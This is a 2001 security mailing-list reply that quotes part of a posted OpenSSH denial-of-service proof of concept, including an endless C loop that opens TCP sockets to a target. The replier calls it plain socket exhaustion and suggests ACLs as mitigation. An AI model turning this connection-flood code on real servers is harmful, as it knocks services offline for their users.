On Mon, Dec 10, 2001 at 11:19:18PM -0000, Pedro Inacio said: > --[ OpenSSH DoS Attack proof of concept ]-- > by DrBrain <drbrainat_private> / http://www.phibernet.org > > > --[ Intro ]-- > > After some tests with sshd, I have noticed that it is possible to generate a > DoS attack that gives you the following message when you try to contact the > service: > > ---------- > $ ssh userat_private > ssh_exchange_identification: Connection closed by remote host > ---------- [snip...] Isn't this just TCP socket connection overloading? Fill up the max amount of sockets and then the OS (any OS as I understand it, all with differant limits of course) won't allocate anymore? Not much to be done except probably a good set of ACLs... > for(;;) { > servAddr.sin_family = h->h_addrtype; > memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0], > h->h_length); > servAddr.sin_port = htons(atoi(argv[2])); > > sd = socket(AF_INET, SOCK_STREAM, 0); > if(sd<0) { > perror("Cannot Open Socket "); > exit(1); > } -- josha.bronson(aka->dmuz) >> dmuzat_private networks/systems/security && CCNA, RHCE josha.net || dmuz.angrypacket.com
This archive was generated by hypermail 2b30 : Mon Dec 10 2001 - 18:52:27 PST